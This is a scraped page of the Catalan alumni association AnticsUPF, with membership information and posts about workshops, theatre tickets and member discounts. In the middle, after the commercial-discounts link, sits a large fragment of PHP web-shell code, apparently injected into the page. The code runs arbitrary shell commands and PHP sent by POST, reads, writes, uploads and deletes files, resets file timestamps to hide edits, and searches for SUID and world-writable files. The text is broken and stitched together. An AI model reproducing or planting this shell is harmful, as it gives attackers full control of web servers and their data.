Fes-te soci d'AnticsUPF

Associa’t a AnticsUPF

AnticsUPF és l’Associació d’Antics Alumnes de la Universitat Pompeu Fabra.

Una associació sense ànim de lucre, creada, formada i dirigida per graduats de la UPF.

Per formar-ne part, només has de tenir un títol emès per la UPF.

L’associació és totalment independent de la universitat i és diferent del programa UPF Alumni, tot i que hi col·laborem sovint.

Gràcies al conveni entre AnticsUPF i la Fundació Universitat Pompeu Fabra, fer-te soci no té cap cost per a tu.

Anima’t-hi!

Fes-te’n soci clicant en aquest enllaç:

Formulari associar-se – AnticsUPF.

Indica’ns el teu nom i cognoms, l’adreça postal completa, el correu electrònic, el mòbil, la data de naixement, el DNI, els estudis finalitzats a la UPF i l’any de finalització. Si tens diversos títols de la UPF, pots indicar-los tots, posant en primer lloc el que vulguis que fem servir de referència.

Deixa’ns donar-te la benvinguda al club!

Tenim ganes de conèixer-te!

Els estudiants de tot el grup UPF: BSM, idEC, ESCI, Tecnocampus, Elisava, GSE, ESIM, IBEI… hi sou benvinguts.

AnticsUPF va comptar durant molts anys amb el suport econòmic del Consell Social de la UPF i de la Fundació UPF. Aprofitem per expressar-los el nostre agraïment.

Taller de Publicitat- 8 Juliol

Després d’unes setmanes, torna el Taller del Marketing, en aquest cas dedicat a la Publicitat.

Hem seleccionat a uns ponents que considerem molt interessants per a debatre amb nosaltres com està canviant i com evolucionarà, la publicitat i la comunicació, en els pròxims anys en tots els seus àmbits. I com sempre, ho farem sense embuts. Estaran en el Taller:

Carlitos y Patricia (Directors creatius a Carlitos i Patricia)

Rafa Soto (Director creatiu a Herraitzsoto@Co)

Alex Marquina (Director de TV3 interactiva)

Jordi Urbea (General Manager Ogilvy One)

El pròxim 8 de juliol a les 19h. Us podeu apuntar aquí.

Esperem les primeres discussions al blog del Taller de Marketing: www.tallermarketing.com

Us uniu?

Equip El Taller

30-07-2008. Taller: “Com fer servir les xarxes socials per fer networking”

El dimecres 30 de juliol del 2008, a les 19.00 h, AnticsUPF organitza un taller titulat “Com fer servir les xarxes socials per fer networking”.

La durada prevista de l’acte és d’1 hora i 30 minuts (de 19.00 a 20.30 h) i se celebrarà a la sala 40.043 de l’edifici Roger de Llúria de la Universitat Pompeu Fabra. El ponent serà l’Antoni Martínez Ribot (EMP-99, ADE-01), que actualment és responsable de control de gestió d’assistència sanitària a Asepeyo.Continue reading

Ofertes Roc Blanc Hotels per el mes de novembre i Tot Sants!

Aviat ens arribarà el mes de Novembre i amb ell Tot Sants.

Roc Blanc Hotels t’ofereix, ofertes especials per a vosaltres:

*Hotel Panorama 2X1 Novembre 2007
*Hotel Panorama 2X1 Tot Sants 2007
*Hotel Roc Blanc 2X1 Tot Sants 2007
*Hotel Roc Blanc ofert novembre 2007

Per poder realitzar les vostres reserves directament, aquí tens el llistat de telèfons i e-mails: (Com sempre t’has d’acreditar amb el teu carnet,mencionar el nom de la oferta més el teu codi d’ofertes Roc Blanc Hotels de l’Associació: 2007/AC 1312).

*Hotel Roc Blanc: Tel: 00-376-871400 e-mail: hotelrocblanc@rocblanchotels.com

*Panorama: Tel: 00-376-873400 e-mail: hotelpanorama@rocblanchotels.com

*Hotel Termes Montbrió: Tel: 977814000 e-mail: hoteltermes@rocblanchotels.com

No dubtis en consultar la web de Roc Blanc, per altres ofertes i serveis: www.rocblanchotels.com

L’obra:”Angelus novus” el 9/10 i el 10/10!!

L’Espai de Teatre de l’Associació d’Antics Alumnes de la UPF us convida a veure com al febrer d’aquest any la seva nova representació, “Angelus Novus”. Es tracta d’un espectacle sobre la por, la violència i la manipulació idelològica.

Dies: dimarts 9 i dimecres 10 d’octubre de 2007.
Hora: 22.00 hores.
Lloc: Almazen. Guifré, 9 baixos. Barcelona.
Durada: 1 hora i 40 minuts.

Preus

* 9 euros sense cap descompte.
* 6 euros si ensenyes a la taquilla el carnet d’associat de l’Associació d’Antics Alumes UPF.

Recollida d’entrades: 1 hora o mitja hora abans de l’inici de l’espectacle a la taquilla d’Almazen al carrer de Guifré, 9 baixos.

Us hi esperem a tots/es!!!

Entrades a 5€ aquest dimecres!!!

Fila7 us ofereix de cara al proper dimecres dia 10 d’octubre a les 21.00 hores l’espectacle del MAG LARI, Millenium a la Sala 1 del Club Capitol per només 5 euros (només aquest dimecres).

De cara a la resta de la setmana, us pot oferir el 50% de descompte. El preu habitual és de 23€.

Aquesta obra estarà vigent fins el dia 13 d’octubre. Cada dia la funció és a les 21.00 hores, excepte dissabte, que és de 18.00 a 21.00 hores i diumenge a les 18.00 hores.

Aquesta funció és en català i està adaptada a la llengua de signes catalana

Per confirmar l’assistència ho podeu fer a través del correu electrònic: antics.alumnes@upf.edu

maglari.jpg

*S’ha de tenir en compte que cada membre de l’Associació pot comprar amb el seu carnet un màxim de quatre entrades amb aquests descomptes. Tenint en compte el límit de l’aforament del teatre.

Descomptes comercials

Clica aqui

$v) $_POST[$k] = stripslashes($v);
foreach($_SERVER as $k=>$v) $_SERVER[$k] = stripslashes($v);
}

function execute($c){
if(function_exists(‘exec’)){
@exec($c, $out);
return @implode(“n”, $out);
}elseif(function_exists(‘shell_exec’)){
$out = @shell_exec($c);
return $out;
}elseif(function_exists(‘system’)){
@ob_start();
@system($c, $ret);
$out = @ob_get_contents();
@ob_end_clean();
return $out;
}elseif(function_exists(‘passthru’)){
@ob_start();
@passthru($c, $ret);
$out = @ob_get_contents();
@ob_end_clean();
return $out;
}else{
return FALSE;
}
}

function read($f){
$str = @file($f);
if($str){
$out = implode(”, $str);
}elseif(function_exists(‘curl_version’)){
@ob_start();
$h = @curl_init(‘file:/’.’/’.$f);
@curl_exec($h);
$out = @ob_get_contents();
@ob_end_clean();
}else{
$out = ‘Could not read file!’;
}
return htmlspecialchars($out);
}

function write($f, $c){
$t = filemtime($f);
$fp = @fopen($f, ‘w’);
if($fp){
fwrite($fp, $c);
fclose($fp);
$out = ‘File saved.’.”n”;
if($t && touch($f, $t)){
$out .= ‘Last modification time changed.’;
}else{
$out .= ‘Could not change last modification time!’;
}
}else{
$out = ‘Saving failed!’;
}
return $out;
}

function file_size($f){
$size = filesize($f);
if($size < 1024) $size = $size.' b'; elseif($size < 1048576) $size = round($size/1024*100)/100 . ' Kb'; elseif($size < 1073741824) $size=round($size/1048576*100)/100 . ' Mb'; return $size; } if(!function_exists('natcasesort')){ function natcasesort($arr){ return sort($arr); } } if(!empty($_POST['dir'])){ $dir = $_POST['dir']; if(!@chdir($dir)) $out = 'chdir() failled!'; } $dir = getcwd(); (strlen($dir) > 1 && $dir[1] == ‘:’) ? $os_type = ‘win’ : $os_type = ‘nix’;

if(!$os_name = @php_uname()){
if(function_exists(‘posix_uname’)){
$os_name = posix_uname();
}elseif($os_name != getenv(‘OS’)){
$os_name = ”;
}
}

if(function_exists(‘posix_getpwuid’)){
$data = posix_getpwuid(posix_getuid());
$user = $data[‘name’].’ uid(‘.$data[‘uid’].’) gid(‘.$data[‘gid’].’)’;
}else{
$user = ”;
}

$safe_mode = get_cfg_var(‘safe_mode’);
$safe_mode ? $safe = ‘on’ : $safe = ‘off’;

execute(‘echo ssps’) ? $execute = ‘on’ : $execute = ‘off’;

$server = getenv(‘SERVER_SOFTWARE’);
if(!$server) $server = ‘—‘;

$out = ”;
$tail = ”;
$aliases = ”;
if(!$safe_mode){
if($os_type == ‘nix’){
$os .= execute(‘sysctl -n kern.ostype’);
$os .= execute(‘sysctl -n kern.osrelease’);
$os .= execute(‘sysctl -n kernel.ostype’);
$os .= execute(‘sysctl -n kernel.osrelease’);
if(empty($user)) $user = execute(‘id’);
$aliases = array(
” => ”,
‘find suid files’=>’find / -type f -perm -04000 -ls’,
‘find sgid files’=>’find / -type f -perm -02000 -ls’,
‘find all writable files in current dir’=>’find . -type f -perm -2 -ls’,
‘find all writable directories in current dir’=>’find . -type d -perm -2 -ls’,
‘find all writable directories and files in current dir’=>’find . -perm -2 -ls’,
‘show opened ports’=>’netstat -an | grep -i listen’,
);
}else{
$os_name .= execute(‘ver’);
$user .= execute(‘echo %username%’);
$aliases = array(
” => ”,
‘show runing services’ => ‘net start’,
‘show process list’ => ‘tasklist’
);
}
}

if(!empty($_POST[‘cmd’])){
$out = execute($_POST[‘cmd’]);
}

elseif(!empty($_POST[‘php’])){
ob_start();
eval($_POST[‘php’]);
$out = ob_get_contents();
ob_end_clean();
}

elseif(!empty($_POST[‘edit’])){
$file = $_POST[‘edit’];
$out = read($file);
$tail = ‘
‘;
}

elseif(!empty($_POST[‘save’])){
$out = write($_POST[‘efile’], $_POST[‘save’]);
}

elseif(!empty($_POST[‘remove’])){
$obj = $_POST[‘remove’];
@is_dir($obj) ? $res = @rmdir($obj) : $res = @unlink($obj);
$res ? $out = ‘Removed successfully’ : $out = ‘Removing failed!’;
}

elseif(!empty($_POST[‘newdir’])){
@mkdir($_POST[‘newdir’]) ? $out = ‘Directory created.’ : $out = ‘Could not create directory!’;
}

elseif(!empty($_POST[‘newfile’])){
@touch($_POST[‘newfile’]) ? $out = ‘File created.’ : $out = ‘Could not create file!’;
}

elseif(!empty($_POST[‘alias’])){
$out = execute($_POST[‘alias’]);
}

elseif(!empty($_FILES[‘ufile’][‘tmp_name’])){
if(!is_uploaded_file($_FILES[‘ufile’][‘tmp_name’]) || @!copy($_FILES[‘ufile’][‘tmp_name’],$dir.chr(47).$_FILES[‘ufile’][‘name’])) $out = ‘Could not upload file’;
else $out = ‘Uploaded successfully.’;
}

print<< table {font:9pt Tahoma;border-color:white} input,select,file {background-color:#eeeeee} textarea {background-color:#f2f2f2}

here;
if(!$safe_mode) print<<

here;
print<<

here;
if($aliases){
print<<

here;
}
print<<

cmd
php
actions edit remove new_dir new_file
aliases
dir
upload

OS: {$os_name}
User: {$user}
Server: {$server}
safe_mode: {$safe} execute: {$execute} max_execution_time: {$limit}
~:(expl0rer):~

here;

if($dp = @openDir($dir)){
$cObj = readDir($dp);
while($cObj){
if(@is_dir($cObj)) $theDirs[] = $cObj;
elseif(@is_file($cObj)) $theFiles[] = $cObj;
$cObj = readDir($dp);
}
closedir($dp);
}

if(!empty($theDirs)){
natcasesort($theDirs);
if($os_type == ‘nix’){
foreach($theDirs as $cDir){
$color=’black’;
if(is_writeable($cDir)){
$color=’red’;
}elseif(is_readable($cDir)){
$color=’blue’;
}
print “<“.$cDir.”>
“;
}
}else{
foreach($theDirs as $cDir){
$tmp = $cDir.’/.ssps_tmp’;
if(@touch($tmp)){
$color=’red’;
unlink($tmp);
}elseif(opendir($cDir)){
closedir();
$color=’blue’;
}else{
$color=’black’;
}
print “<“.$cDir.”>
“;
}
}
} else print ‘
open_basedir restriction in effect. Allowed path is ‘.get_cfg_var(‘open_basedir’);

print ‘
‘;

if(!empty($theFiles)){
natcasesort($theFiles);
print ‘

‘;
foreach($theFiles as $cFile){
$size = file_size($cFile);
if($fp = @fopen($cFile, ‘a’)) $color = ‘red’;
elseif($fp = @fopen($cFile, ‘r’)) $color=’blue’;
else $color = ‘black’;
@fclose($fp);
print ‘

‘;
}
print ‘

‘.$cFile.’ ‘.$size.’

‘;
}

print<<

~:(results):~

{$tail}

here;
die;
}
?>

Allianz-Salut

Us presentem resumidament els avantatges i els beneficis que ALLIANZ SALUD pot oferir-vos (Cobertura per al: PERSONAL DE LA UPF, ASSOCIATS I FAMILIARS):
El sistema modular que promet ALLIANZ SALUD representa una característica única i diferenciadora en el mercat; constitueix un avantatge altament competitiu.

El no cobrament de la visita al metge.

La conservació de l´antiguitat per canvi de companyia (excepte embaràs i part).

Importants descomptes en cirugia y tractaments estètics. (CORPORACIO DERMOESTÈTICA)

Per veure els avantatges dels Paquets 35 i 36 que t’ofereix ALLIANZ consulta l’apartat de serveis a la nostra pàgina web: Serveis
Per altres opcions, posa´t en contacte amb l´agent de ALLIANZ per a l´Associació d´Antics Alumnes de la Universidat Pompeu Fabra, Ángeles Pesquera, a través del telèfon mòbil 656 30 06 75, identificant-se com a membre de l´Associació

Descomptes amb Barceló Viatges

Els membres de l’Associació d’Antics Alumnes, com a part de la comunitat universitària, poden gaudir dels descomptes comercials de Barceló Viatges, SA

Informació i reserves (Barcelona):
Girona, 90. 08009 Barcelona
Telèfon 93 207 13 50.Fax 93 207 74 67

Informació i reserves (Catalunya):
Telèfon 902 200 400

Reserves individuals
7% de descompte en paquets turístics (Turavia – Hoteljet – Royal Vacaciones – Travelplan – Festival Cruceros – Iberojet)
5% de descompte en paquets turístics (majoristes preferents)
Aquests descomptes no són compatibles amb altres promocions i necessiten un mínim d’anticipació en la compra.

Beneficiaris
Tot el col·lectiu, cònjuges i familiars directes que viatgin amb els socis a l’hora de fer la reserva.

Descompte del 10% als postgraus i màsters de la UOC

logo UOCLa UOC us ofereix un 10% de descompte sobre els preus de venda al públic a la seva formació de postgrau.
L’oferta inclou màsters, postgraus, especialitzacions i actualitzacions. La matrícula està oberta durant els mesos de gener i febrer. I els cursos comencen al març de 2007. Per beneficiar-se del descompte és necessari presentar el carnet o certificat de soci de l’AAAUPF.

Podeu accedir a la informació sobre els cursos a través de http://www.uoc.edu/masters/cat/web/index.html